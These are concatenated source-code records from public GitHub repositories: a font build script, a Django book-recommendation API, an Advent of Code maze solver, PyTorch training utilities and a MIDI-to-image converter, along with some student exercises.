self.tables[\"name\"].update({\n 0: hindkit.fallback(\n self.family.info.copyright,\n \"Copyright {} Struckby (design@struckby.co)\".format(self.release_year_range),\n ),\n 7: None,\n 8: \"Struckby\",\n 9: \"Saumya Kishore and Sanchit Sawaria\",\n 11: \"https://struckby.co\",\n 13: \"This Font Software is licensed under the SIL Open Font License, Version 1.1. This license is available with a FAQ at: http://scripts.sil.org/OFL\",\n 14: \"http://scripts.sil.org/OFL\",\n })\n self.tables[\"OS/2\"].update({\n \"Vendor\": None,\n })\nhindkit.Client.override = client_override\n\nfamily = hindkit.Family(\n trademark = \"Bak-Bak\",\n script_name = \"Devanagari\",\n client_name = \"Google Fonts\",\n initial_release_year = 2017,\n)\ni = family.info\ni.openTypeHheaAscender, i.openTypeHheaDescender, i.openTypeHheaLineGap = 1050, -350, 100\ni.openTypeOS2TypoAscender, i.openTypeOS2TypoDescender, i.openTypeOS2TypoLineGap = 1050, -350, 100\ni.openTypeOS2WinAscent, i.openTypeOS2WinDescent = 1100, 400\n\nfamily.set_masters([\n (\"Regular\", 0),\n])\nfamily.set_styles([\n (\"Regular\", 0, 400),\n])\n\nproject = hindkit.Project(\n family,\n fontrevision = \"0.200\",\n options = {\n\n \"prepare_kerning\": True,\n \"prepare_mark_positioning\": True,\n\n \"match_mI_variants\": 1,\n \"position_marks_for_mI_variants\": True,\n\n # \"build_ttf\": True,\n \"do_style_linking\": True,\n\n # \"use_os_2_version_4\": True,\n # \"prefer_typo_metrics\": True,\n # \"is_width_weight_slope_only\": True,\n\n \"additional_unicode_range_bits\": [0, 1, 2],\n\n },\n)\nproject.build()\n","repo_name":"agoodfeelingco/bakbak","sub_path":"sources/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23997878521","text":"import datetime\n#declare the dictonary\ninventory={}\n#take input for price and item\nfor i in range(1,6):\n\n #take user input\n print(\"Please enter item\",i,\":\")\n s=input()\n print(\"Please enter the price of item\",i,\":\")\n p=float(input())\n #store values into dictonary\n inventory[i-1]=s\n #set value to key\n inventory[s]=p\n\n#print welcome message\nprint(\"\\nWelcome to Ace HardWare!\\n\")\n#declare empty list\nname_l=[]\nquan_l=[]\n#take value from user\nfor i in range(3):\n #take values\n name=input(\"What is the first item you would like to purchase?\\n\")\n quan=int(input(\"How many would you like to purchase?\\n\"))\n #add into list\n name_l.append(name)\n quan_l.append(quan)\n#print time#\nprint(\"\\nThanks for shopping at Ace HardWare!\\n\")\nx = datetime.datetime.now()\nprint(x,'\\n')\n#print receipt\nfor i in range(3):\n print(quan_l[i],' ',name_l[i],'(s) @',\"{0:.2f}\".format(inventory[name]),' = $',\"{0:.2f}\".format(quan_l[i]*inventory[name]),sep='')\n\n","repo_name":"AbbyWood22/MART120","sub_path":"homework_2/Ace.py","file_name":"Ace.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70908732627","text":"# Models\nfrom .models import User\nfrom tags.models import Tag\nfrom books.models import Book\nfrom tags.models import TagAffinity\nfrom numpy.random import choice\n# Django\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\n# Serializer\nfrom .serializers import UserPostSerializer\nfrom .serializers import UserGetSerializer\nfrom .serializers import UserAddgenres\n# Utils\nfrom utils.documentation import get_documentation\n# drf yasg\nfrom drf_yasg.utils import swagger_auto_schema as sas\n\n\n\n#@sas(**get_documentation('post_user'))\n@api_view(['POST'])\ndef post_user(request, *args, **kwargs):\n data = request.data\n \n serializer = UserPostSerializer(data = request.data)\n if serializer.is_valid():\n email = serializer.validated_data.get('email')\n try:\n user = User.objects.get(email = email)\n except User.DoesNotExist:\n user = None\n if(user):\n return Response(\n {'El usuario ya existe'},\n status=status.HTTP_200_OK,\n )\n first_name = serializer.validated_data.get('first_name')\n last_name = serializer.validated_data.get('last_name')\n password = serializer.validated_data.get('password')\n list_of_tags = serializer.validated_data.get('list_of_tags')\n list_of_affinities = serializer.validated_data.get('list_of_affinities')\n user = User(\n email = email,\n first_name = first_name,\n last_name = last_name,\n password = password\n )\n user.save()\n # Asignar tags\n i = 0\n while i < len(list_of_tags):\n tagAux = list_of_tags[i]\n affinity = int(list_of_affinities[i])\n tag = Tag.objects.get(tag_name = tagAux)\n user.tag.add(tag)\n tagAffinity = TagAffinity.objects.create(\n tag_name_affinity = tagAux,\n affinity = affinity\n )\n user.tagAffinity.add(tagAffinity)\n i = i+1\n user.save()\n return Response(\n {'Usuario creado!'},\n status=status.HTTP_201_CREATED,\n )\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n@api_view(['POST'])\ndef get_user(request, *args, **kwargs):\n data = request.data\n \n serializer = UserGetSerializer(data = request.data)\n if serializer.is_valid():\n try:\n user = User.objects.get(email = serializer.validated_data.get('email'))\n except User.DoesNotExist:\n user = None\n if(user):\n list_of_tags = []\n list_of_affinities = []\n print(user.tagAffinity.all())\n for tag in user.tagAffinity.all():\n list_of_tags.append(tag.tag_name_affinity)\n list_of_affinities.append(tag.affinity)\n\n response_dict = {\n 'first_name': user.first_name,\n 'second_name': user.last_name,\n 'list_of_tags': list_of_tags,\n 'list_of_affinities': list_of_affinities\n }\n return Response(\n response_dict,\n status=status.HTTP_200_OK,\n ) \n return Response(\n {'El usuario no existe'},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n\n@api_view(['POST'])\ndef get_recomendations(request, *args, **kwargs):\n data = request.data\n serializer = UserGetSerializer(data = request.data)\n if serializer.is_valid():\n try:\n user = User.objects.get(email = serializer.validated_data.get('email'))\n except User.DoesNotExist:\n user = None\n if(user):\n list_of_affinities = []\n list_of_affinities_aux = user.tagAffinity.all()\n tags = user.tag.all()\n i = 0\n for tag in tags:\n if(tag.tag_name == list_of_affinities_aux[i].tag_name_affinity):\n list_of_affinities.append(list_of_affinities_aux[i].affinity)\n i = i+1\n list_of_books = []\n i = 0\n for tag in tags:\n books = Book.objects.filter(tag = tag)\n random_books = choice(books, list_of_affinities[i])\n i = i+1\n list_of_books.extend(random_books)\n final = choice(list_of_books, 20)\n dict_response = {}\n i = 1\n for book in final:\n dict_response.update({'Book '+str(i): {}})\n dict_response['Book '+str(i)].update({'title': book.title})\n dict_response['Book '+str(i)].update({'summary': book.summary})\n dict_response['Book '+str(i)].update({'tags': {}})\n j = 1\n for tag in book.tag.all():\n dict_response['Book '+str(i)]['tags'].update({'tag_name '+str(j): tag.tag_name})\n j = j+1\n i += 1\n \n return Response (\n dict_response,\n status=status.HTTP_200_OK\n )\n\n return Response(\n {'El usuario no existe'},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(\n serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )","repo_name":"HectorPerezM/vivlio","sub_path":"django/users/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11268925032","text":"from queue import Queue\n\ndef load_input(inpf):\n grid = []\n with open(inpf) as f:\n\n for line in f.read().splitlines():\n if not line.strip():\n continue\n grid.append([c for c in line])\n \n doors = []\n\n # horizontal doors\n y = 0\n for row in grid:\n for i in range(0, len(row) - 1):\n door = row[i] + row[i+1]\n #print(door)\n if door.isalpha():\n if i == 0:\n doors.append((i+2, y, door, 'outer'))\n elif i == len(row) - 2:\n doors.append((i-1, y, door, 'outer'))\n elif i+2 < len(row) and row[i+2] == '.':\n doors.append((i+2, y, door, 'inner'))\n else:\n doors.append((i-1, y, door, 'inner'))\n y += 1\n\n for x in range(0, len(grid[0])):\n for y in range(0, len(grid)-1):\n door = grid[y][x] + grid[y+1][x]\n if door.isalpha():\n if y == 0:\n doors.append((x, y+2, door, 'outer'))\n elif y == len(grid) - 2:\n doors.append((x, y-1, door, 'outer'))\n elif y+2 < len(grid) and grid[y+2][x] == '.':\n doors.append((x, y+2, door, 'inner'))\n else:\n doors.append((x, y-1, door, 'inner'))\n\n door_map = {}\n door_types = {}\n for x, y, door, tp in doors:\n mapping = door_map.get(door)\n if not mapping:\n mapping = []\n door_map[door] = mapping\n mapping.append((x,y))\n door_types[(x,y)] = tp\n \n portals = {}\n for _, entrances in door_map.items():\n if len(entrances) == 2:\n portals[entrances[0]] = entrances[1]\n portals[entrances[1]] = entrances[0]\n\n return (grid, portals, door_map, door_types)\n\n\ndef available_tiles(x, y, grid):\n #print(x,y)\n available = []\n for xx, yy in [\n (x+1, y),\n (x, y-1),\n (x-1, y),\n (x, y+1)]:\n tile = grid[yy][xx]\n #print(xx, yy, tile)\n if tile == '.':\n #print(' .. append')\n available.append((xx, yy))\n return available\n\n\ndef reach_doors(x,y, grid, doors):\n terminal = set()\n for _, entrances in doors.items():\n terminal = terminal.union(set(entrances))\n \n reached = []\n q = Queue()\n visited = set()\n start = (x,y)\n\n q.put((x, y, 0))\n\n visited.add((x,y))\n\n while not q.empty():\n x, y, path_len = q.get()\n if (x,y) in visited:\n if (x,y) != start:\n #print('out?')\n continue\n \n visited.add((x,y))\n\n if (x,y) in terminal and (x,y) != start:\n reached.append((x,y, path_len))\n\n for xx, yy in available_tiles(x, y, grid):\n #print(xx, yy)\n q.put((xx, yy, path_len + 1))\n\n return reached\n\nclass V:\n\n def __init__(self, n, _type=None):\n self.n = n\n self.type = _type\n self.in_edges = []\n self.out_edges = []\n \n def __repr__(self):\n return 'V({}, {})'.format(self.n, self.type)\n \n def __eq__(self, o):\n if isinstance(o, V):\n return o.n == self.n\n return False\n \n def __hash__(self):\n return self.n.__hash__()\n \n\nclass E:\n\n def __init__(self, a, b, length=0):\n self.a = a\n self.b = b\n self.length = length\n \n def __repr__(self):\n return '{} <-> {}, {} steps'.format(self.a, self.b, self.length)\n \n def __eq__(self, o):\n if isinstance(o, E):\n return o.a == self.a and o.b == self.b\n return False\n \n def __hash__(self):\n return '{}<>{}'.format(self.a, self.b).__hash__()\n\n\n\nclass G:\n\n def __init__(self):\n self.vertices = {}\n self.edges = {}\n \n def add_vertex(self, n):\n if isinstance(n, V):\n self.vertices[n.n] = n\n return n\n v = V(n)\n self.vertices[n] = v\n return v\n \n def vertex(self, n):\n return self.vertices[n]\n \n def remove_vertex(self, v):\n if v.n not in self.vertices:\n return\n del self.vertices[v.n]\n \n self.edges = {vxs:edge for vxs, edge in filter(lambda vs: v not in vs, self.edges.items())}\n\n def add_edge(self, a, b, length=None):\n edge = E(a, b, length)\n if self.edges.get((a,b)):\n ex = self.edges[(a,b)]\n a.out_edges.remove(ex)\n b.in_edges.remove(ex)\n self.edges[(a,b)] = edge\n a.out_edges.append(edge)\n b.in_edges.append(edge)\n return edge\n\n def clone(self):\n cl = G()\n\n for n, v in self.vertices.items():\n cv = V(n, v.type)\n cl.add_vertex(cv)\n \n for vxs, edge in self.edges.items():\n va, vb = vxs\n ce = cl.add_edge(cl.vertex(va.n), cl.vertex(vb.n))\n ce.length = edge.length\n\n return cl\n\n def __repr__(self):\n return '{} vertices, {} edges'.format(len(self.vertices), len(self.edges))\n\n\ndef build_graph(inpf, use_portals=True):\n grid, portals, dmap, dtypes = load_input(inpf)\n graph = G()\n\n doors = {}\n for door, entrances in dmap.items():\n if len(entrances) == 1:\n doors[door] = entrances[0]\n else:\n for i in range(0, 2):\n doors[door + str(i)] = entrances[i]\n \n rdoors = {}\n for name, pos in doors.items():\n v = graph.add_vertex(name)\n rdoors[pos] = name\n v.type = dtypes[pos]\n \n for name, door in doors.items():\n x, y = door\n for xx, yy, path_len in reach_doors(x, y, grid, dmap):\n if use_portals:\n other = portals.get((x,y))\n if other == (xx, yy):\n continue\n edge = graph.add_edge(graph.vertex(name), graph.vertex(rdoors[(xx, yy)]))\n edge.length = path_len\n \n if use_portals:\n # add portals as edges with 0 length\n for a,b in portals.items():\n va = graph.vertex(rdoors[a])\n vb = graph.vertex(rdoors[b])\n edge = graph.add_edge(va, vb)\n edge.length = 1\n \n return graph\n\n\ndef build_multilevel_graph(inpf, levels):\n grid, portals, dmap, dtypes = load_input(inpf)\n\n tunnels = {}\n for door, _ in dmap.items():\n door = door[0:2]\n if door not in ['AA', 'BB']:\n tunnels[door + '0'] = door + '1'\n tunnels[door + '1'] = door + '0'\n\n og = build_graph(inpf, False)\n graph = G()\n\n \n level = 1\n while level < levels:\n for _, v in og.vertices.items():\n if v.n in ['AA', 'ZZ']:\n continue\n graph.add_vertex(V('{}.{}'.format(v.n, level), v.type))\n \n for _, edge in og.edges.items():\n a = edge.a\n b = edge.b\n\n\n if a.n in ('AA', 'ZZ') or b.n in ('AA', 'ZZ'):\n continue\n if a.type == b.type:\n graph.add_edge(\n graph.vertex('{}.{}'.format(a.n, level)),\n graph.vertex('{}.{}'.format(b.n, level)),\n edge.length,\n )\n graph.add_edge(\n graph.vertex('{}.{}'.format(b.n, level)),\n graph.vertex('{}.{}'.format(b.n, level)),\n edge.length,\n )\n elif a.type == 'outer':\n graph.add_edge(\n graph.vertex('{}.{}'.format(a.n, level)),\n graph.vertex('{}.{}'.format(b.n, level)),\n edge.length,\n )\n graph.add_edge(\n graph.vertex('{}.{}'.format(b.n, level)),\n graph.vertex('{}.{}'.format(a.n, level)),\n edge.length,\n )\n if level > 1:\n prev_n = tunnels[a.n]\n graph.add_edge(\n graph.vertex('{}.{}'.format(prev_n, level-1)),\n graph.vertex('{}.{}'.format(a.n, level)),\n 1\n )\n graph.add_edge(\n graph.vertex('{}.{}'.format(a.n, level)),\n graph.vertex('{}.{}'.format(prev_n, level-1)),\n 1\n )\n else:\n pass\n \n level += 1\n\n\n aa = og.vertex('AA')\n a = graph.add_vertex(V('AA', 'outer'))\n for edge in aa.out_edges:\n b = edge.b\n if b.type == 'inner':\n graph.add_edge(\n a,\n graph.vertex('{}.1'.format(b.n)),\n edge.length + 1\n )\n else:\n pass\n\n \n zz = og.vertex('ZZ')\n z = graph.add_vertex(V('ZZ', 'outer'))\n for edge in zz.in_edges:\n a = edge.a\n if a.type == 'inner':\n graph.add_edge(\n graph.vertex('{}.1'.format(a.n)),\n z,\n edge.length + 1\n )\n else:\n pass\n\n return graph\n\n\ndef dijkstra(graph):\n start = graph.vertex('AA')\n end = graph.vertex('ZZ')\n\n distance = {start.n: 0}\n visited = set()\n\n q = [start]\n\n while q:\n q = sorted(q, key=lambda v: distance.get(v.n, 2**30))\n curr = q[0]\n #print(curr, curr.out_edges)\n q = q[1:]\n if curr in visited and curr != start:\n continue\n if curr == end:\n return distance[curr.n]\n dist = distance[curr.n]\n visited.add(curr)\n for edge in curr.out_edges:\n nn = edge.b\n alt = edge.length + dist\n if alt < distance.get(nn.n, 2**30):\n distance[nn.n] = alt\n q.append(nn)\n \n\n\ninput_file = 'input'\n\ngraph = build_graph(input_file)\nprint(graph)\nprint('Part 1:', dijkstra(graph))\n\nmg = build_multilevel_graph(input_file, 100)\nprint(mg)\nprint('Part 2:', dijkstra(mg) - 2) # '- 2' because I tie some extra node in the graph obviously!\n","repo_name":"natemago/advent-of-code-2019","sub_path":"day-20-donut-maze/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":10131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42135410649","text":"from torch.nn.modules.module import Module\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional as F\nimport gc\nfrom time import sleep\n\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import collections as mc\nimport pylab\nimport matplotlib.pyplot as plt\nimport time\nfrom skimage.io import imsave\n\nclass SupervisedInstanceEmbeddingLoss(Module):\n def __init__(self, push_margin):\n super().__init__()\n self.push_margin = push_margin\n\n def pull_distance(self, x, y, dim_channels, dim_samples):\n return (x - y).norm(p=2, dim=dim_channels).mean(dim=dim_samples)\n\n def push_distance_measure(self, x, y, dim_channels):\n return (self.push_margin - (x-y).norm(p=2, dim=dim_channels)).relu_()\n\n def push_distance(self, centroids, dim_channels, dim_samples):\n assert centroids.dim() == 2\n distance_matrix = self.push_distance_measure(\n centroids.unsqueeze(dim_samples),\n centroids.unsqueeze(dim_samples+1),\n dim_channels=-1,\n )\n # select vectorized upper triangle of distance matrix\n n_clusters = distance_matrix.shape[0]\n upper_tri_index = torch.arange(1, n_clusters * n_clusters + 1) \\\n .view(n_clusters, n_clusters) \\\n .triu(diagonal=1).nonzero().transpose(0, 1)\n cluster_distances = distance_matrix[upper_tri_index[0], upper_tri_index[1]]\n\n return cluster_distances.mean()\n\n def forward(self, abs_embedding, coordinates, y, split_pull_push=False):\n pull_loss = torch.tensor(0.).to(abs_embedding.device)\n push_loss = torch.tensor(0.).to(abs_embedding.device)\n\n for b in range(len(y)):\n cx = coordinates[b, :, 1].long()\n cy = coordinates[b, :, 0].long()\n\n y_per_patch = y[b, cx, cy]\n centroids = []\n dim_channels, dim_samples = 1, 0\n pull_over_instances = 0\n\n for idx in torch.unique(y_per_patch):\n patch_mask = y_per_patch == idx\n if idx == 0:\n # skip background instance\n continue\n\n instance_embedding = abs_embedding[b, patch_mask]\n\n centroid = instance_embedding.mean(dim=dim_samples,\n keepdim=True)\n centroids.append(centroid)\n pull_over_instances = pull_over_instances + \\\n self.pull_distance(\n centroid, instance_embedding, dim_channels, dim_samples)\n\n # add push loss between centroids\n if len(centroids) > 1:\n pull_loss = pull_loss + (pull_over_instances / len(centroids))\n push_loss = push_loss + self.push_distance(torch.cat(centroids, dim=0),\n dim_channels, dim_samples)\n\n if split_pull_push:\n return pull_loss, push_loss\n else:\n return pull_loss + push_loss\n","repo_name":"funkelab/lisl","sub_path":"lisl/pl/loss_supervised.py","file_name":"loss_supervised.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73407515026","text":"#Eğer bir uygulama yazarken aşağıdaki kalıbı kullanarak dosya yazarsanız kapatmayı unuttuğunuzda python sizin için dosyayı kaptır ve bilgisayarınızı zorlamaz.\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n print(dosya.read())\r\n#Yukarıda da seek() donksiyonuna verdiğimiz argümandan sonraki kısmını ekrana yazdırır.\r\n\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n print(dosya.read())\r\n dosya.seek(5)\r\n print(dosya.read)\r\n#Yukarıdaki gibi bir program yazarsak seek() fonksiyonu normalde 10 karakter ileri atmıştı ama bu diğer işlemde en başa döner ve toplam olarak 15 olmaz 5 karakter ileri gider.\r\n\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n print(dosya.read(5))\r\n#Yukarıdaki programı çalıştırırsakta 10 katrakter sonrasındaki 5 karakteri ekrana bastıracaktır.\r\n\r\nwith open(\"yazılım.txt\",\"r\") as dosya:\r\n dosya.seek(10)\r\n str1 = dosya.read(5)\r\n dosya.seek(15)\r\n str2 = dosya.read(5)\r\n print(str1,str2)\r\n#Yukarıdaki pRogramı da çalıştırırsak eğer ilk olarak baştan 10 karakter gidip sonraki 5 karakteri bastıracak ve sonrada baştan 15 karakter gidip sonraki 5 karakteri bastıracak.\r\n\r\n","repo_name":"cdemir7/Python_Ornekleri","sub_path":"Dosyadan veri alma ve okuma işlemleri 2.py","file_name":"Dosyadan veri alma ve okuma işlemleri 2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72979435666","text":"from argparse import Namespace\nfrom typing import Callable, Iterator, Optional, Union\n\nfrom torch import nn, optim\n\ndef get_initialiser(name: str) -> Callable:\n if name == \"orthogonal\":\n return nn.init.orthogonal_\n elif name == \"xavier\":\n return nn.init.xavier_uniform_\n elif name == \"kaiming\":\n return nn.init.kaiming_uniform_\n elif name == \"none\":\n pass\n else:\n raise Exception(\"Unknown init method\")\n\n\ndef get_optimizer(\n args: Namespace, params: Iterator[nn.Parameter], net: Optional[str] = None\n) -> optim.Optimizer:\n weight_decay = args.weight_decay\n lr = args.lr\n\n optimizer = None\n if args.optimizer == \"sgd\":\n optimizer = optim.SGD(params, lr=lr, weight_decay=weight_decay)\n elif args.optimizer == \"adam\":\n optimizer = optim.Adam(params, lr=lr, weight_decay=weight_decay)\n elif args.optimizer == \"amsgrad\":\n optimizer = optim.Adam(params, lr=lr, amsgrad=True, weight_decay=weight_decay)\n return optimizer\n\n\nclass NoneScheduler:\n def step(self):\n pass\n\n\ndef get_lr_scheduler(\n args: Namespace, optimizer: optim.Optimizer\n) -> Union[\n optim.lr_scheduler.ExponentialLR,\n optim.lr_scheduler.CosineAnnealingLR,\n optim.lr_scheduler.CyclicLR,\n NoneScheduler,\n]:\n if args.lr_scheduler == \"exponential\":\n return optim.lr_scheduler.ExponentialLR(optimizer, gamma=args.lr_gamma)\n elif args.lr_scheduler == \"cosine\":\n return optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.max_epochs, eta_min=0)\n elif args.lr_scheduler == \"cycle\":\n return optim.lr_scheduler.CyclicLR(\n optimizer, 0, max_lr=args.lr, step_size_up=20, cycle_momentum=False\n )\n elif args.lr_scheduler == \"none\":\n return None\n\n\ndef get_optimizer_scheduler(\n args: Namespace, model: nn.Module\n):\n optimizer = get_optimizer(args=args, params=model.parameters())\n lr_scheduler = get_lr_scheduler(args=args, optimizer=optimizer)\n return optimizer, lr_scheduler\n\ndef get_initialiser(name='xavier'):\n if name == \"orthogonal\":\n return nn.init.orthogonal_\n elif name == \"xavier\":\n return nn.init.xavier_uniform_\n elif name == \"kaiming\":\n return nn.init.kaiming_uniform_\n elif name == \"none\":\n pass\n else:\n raise Exception(\"Unknown init method\")\n\n\ndef get_activation(name: str, leaky_relu: Optional[float] = 0.5) -> nn.Module:\n if name == \"leaky_relu\":\n return nn.LeakyReLU(leaky_relu)\n elif name == \"rrelu\":\n return nn.RReLU()\n elif name == \"relu\":\n return nn.ReLU()\n elif name == \"elu\":\n return nn.ELU()\n elif name == \"gelu\":\n return nn.GELU()\n elif name == \"prelu\":\n return nn.PReLU()\n elif name == \"selu\":\n return nn.SELU()\n else:\n raise Exception(\"Unknown activation\")\n\ndef get_iter(data_matrix, batch_size, shuffle=True):\n dataset = Dataset_from_matrix(data_matrix)\n iterator = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle)\n return iterator","repo_name":"hlzhang109/TransTEE","sub_path":"Dosage/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"17459163710","text":"import music21\nimport numpy as np\nfrom music21 import *\nfrom imageio import imwrite\nimport cv2\nimport os\n\n\ndef get_note(note):\n return int(note.pitch.ps)\n\ndef get_duration(element):\n return element.duration.quarterLength\n\ndef get_note_details(elements_to_parse,verbose=False):\n durations = []\n notes = []\n start = []\n amplitudes = []\n\n # the constituent elements of the score\n # We need:\n # - Notes\n # - chords\n for element in elements_to_parse:\n if verbose:\n print(element)\n if isinstance(element, note.Note):\n if not element.isRest:\n # offset is the position of the note in the song (offset from beginning)\n start.append(element.offset)\n # the note is identified using ps, which is found by combining the note name, octave, and accidental (sharp # or flat -)\n # this note value is recorded as a number\n notes.append(int(element.pitch.ps))\n # duration is measured in quarter notes and is given as a float. 0.5 quarter notes are eight notes\n durations.append(element.duration.quarterLength)\n # amplitude is recorded using velocityscalar, a value between 0 and 1 which scales to a value between 0 and 127 when used in the midi file\n amplitudes.append(element.volume.velocityScalar)\n\n # basically the same as with note but we get the notes that constitute the chord instead\n if isinstance(element, chord.Chord):\n if not element.isRest:\n for chord_note in element.notes:\n start.append(element.offset)\n notes.append(int(chord_note.pitch.ps))\n durations.append(element.duration.quarterLength)\n amplitudes.append(element.volume.velocityScalar)\n\n return {\"pitch\": notes, \"amps\" : amplitudes, \"start\": start, \"dur\": durations}\n\n\ndef get_tempo(midi):\n for instrument_part in instrument.partitionByInstrument(midi):\n instrument_notes = instrument_part.recurse()\n for n in instrument_notes:\n if isinstance(n, tempo.MetronomeMark):\n # print(\"bpm\",n.getQuarterBPM())\n return n.getQuarterBPM()\n return 120\n\ndef get_time_sig(midi):\n for instrument_part in instrument.partitionByInstrument(midi):\n instrument_notes = instrument_part.recurse()\n #print(\"timesig:\",instrument_part)\n for n in instrument_notes:\n #print(n)\n if isinstance(n, meter.TimeSignature):\n #print(n.ratioString)\n return n.ratioString\n return [4,4]\n\ndef create_image(inst, score, image_data, dest_path, count=0, verbose=False):\n scale = 4\n image_res = image_data[0]\n image_height = image_data[1]\n image_length = image_data[2]\n\n\n if verbose:\n print(\"Drawing:\", inst)\n\n pitches = score[\"pitch\"]\n amplitudes = score[\"amps\"]\n durations = score[\"dur\"]\n starts = score[\"start\"]\n\n if verbose:\n print(\"p\", pitches)\n print(\"a\", amplitudes)\n print(\"d\", durations)\n print(\"s\", sorted(starts, reverse=False))\n # print(\"end\",starts[-1])\n # print(\"dur\",durations[-1])\n\n pixels = np.zeros((image_height, int(image_length)))\n\n # print(starts[100:110])\n\n for i in range(len(pitches)):\n # converting to an int here may prove a problem on fractions. Will have to figure that out later\n start = int(starts[i] * image_res * scale)\n dur = int(durations[i] * image_res * scale)\n pitch = int(pitches[i])\n\n new_bar_count = 0\n for j in range(start, start + dur):\n try:\n if image_res > 1:\n beg = (pitch * image_res) - int(image_res / 2)\n end = (pitch * image_res) + int(image_res / 2) + 1\n pixels[beg:end, j] = amplitudes[i] * 255\n\n else:\n pixels[pitch, j] = amplitudes[i] * 255\n\n except IndexError:\n while True:\n try:\n new_bar = np.zeros((image_height, int(image_length)))\n pixels = np.append(pixels, new_bar, axis=1)\n if image_res > 1:\n beg = (pitch * image_res) - int(image_res / 2)\n end = (pitch * image_res) + int(image_res / 2) + 1\n pixels[beg:end, j] = amplitudes[i] * 255\n else:\n pixels[pitch, j] = amplitudes[i] * 255\n new_bar_count = 0\n break\n except:\n new_bar = np.zeros((image_height, int(image_length)))\n pixels = np.append(pixels, new_bar, axis=1)\n new_bar_count += 1\n\n # check if the destination directory exists, if not then make it\n if not os.path.exists(dest_path):\n os.makedirs(dest_path)\n\n # creates the midi image at the destination\n status = cv2.imwrite(os.path.join(dest_path, f\"{inst}{count}.png\"), pixels)\n if verbose:\n print(\"Written:\", inst, \"image to\",dest_path)\n print()\n return status\n\ndef midi_to_image(path, image_res=4, upper=127, lower=8, verbose=False, dest_path=None, specific_inst=\"\",count=0, silence_warning=True):\n #print(\"___MIDI TO IMAGE___\")\n if dest_path is None:\n dest_path = path\n # The following declares the current midi and establishes the tempo and time sig\n # print(\"Getting:\",path)\n\n # overwrites a warning produced by some midi files about empty chords being treated as grace\n if silence_warning:\n def noop(input):\n pass\n music21.midi.translate.environLocal.warn = noop\n try:\n midi = converter.parse(path)\n except:\n return False\n if instrument.partitionByInstrument(midi) is None:\n return False\n tempo = get_tempo(midi)\n timesig = get_time_sig(midi)\n scale = 4\n\n # Calculate bar length for the image size\n bar_length = 60/tempo * int(timesig[0])\n\n if verbose:\n print(\"Processing midi_____\")\n print(f\"Midi tempo:{tempo} timesig:{timesig} bar_length:{bar_length}\")\n\n # we multiply the bar length by 4 and the image resolution in order to scale it up\n image_length = bar_length*image_res * scale\n image_height = (upper - lower) * image_res\n\n # Retrieval of music scores for each instrument\n data = {}\n try:\n i = 0\n for instrument_part in instrument.partitionByInstrument(midi):\n # If a specific instrument has been stated then only an image of that is created\n if specific_inst != \"\" and specific_inst.lower() not in instrument_part.partName.lower():\n # print(instrument_part.partName.lower())\n # print(\"continuing\")\n continue\n # print(specific_inst)\n # print(instrument_part.partName.lower())\n # print(\"match\")\n # print()\n\n if verbose:\n print(\"ip\",instrument_part)\n\n instrument_notes = instrument_part.recurse()\n note_data = get_note_details(instrument_notes)\n #print(note_data)\n\n if len(note_data[\"start\"]) > 0:\n if instrument_part.partName is None:\n if instrument_part.instrumentName is not None:\n data[instrument_part.instrumentName] = note_data\n print(instrument_part.instrumentName)\n else:\n data[f\"instrument_{i}\"] = note_data\n i+=1\n else:\n # saves the notes of that instrument to a dictionary value, the key of which is the name of the instrument\n data[instrument_part.partName] = note_data\n if verbose:\n print(\"pn\", instrument_part.partName)\n else:\n if verbose:\n print(instrument_part,\"failed\")\n except:\n # print(\"Exception\")\n instrument_notes = midi.flat.notes\n data[\"instrument_0\"] = get_note_details(instrument_notes)\n\n # if verbose:\n # print(\"IR:\",image_res)\n # print(\"IL:\",image_length)\n # print(\"IH:\",image_height)\n # print(\"BL:\",bar_length)\n\n # Writing to image section\n status = False\n for inst, score in data.items():\n # print(inst.lower())\n # print(\"match\",specific_inst.lower() in inst.lower())\n #print(inst)\n image_data = (image_res, image_height, image_length)\n status = create_image(inst, score, image_data, dest_path, count=count,\n verbose=verbose) # ,score,verbose,image_res,dest_path,count=0\n count += 1\n ## This was to make sure that only the right instrument is recorded but the check was moved earlier in the function\n # if specific_inst.lower() in inst.lower():\n # inst=specific_inst\n #\n # # If a specific instrument has been stated then only an image of that is created\n # if specific_inst != \"\" and specific_inst != inst:\n # continue\n # else:\n\n return status\n\n\ndef find_music_qualities(midipath):\n \"\"\"\n parse returns a music score based on the midi data given, that can then be analysed\n :return:\n \"\"\"\n\n # score contains\n score = converter.parse(midipath)\n print(score)\n print(len(score.pitches), \"notes in the song\")\n print(len(score.parts), \"instruments in the song\")\n\n # This breaks down the track into instrumental parts\n i = 0\n for part in score.parts:\n #print(\"Stream:\",part)\n 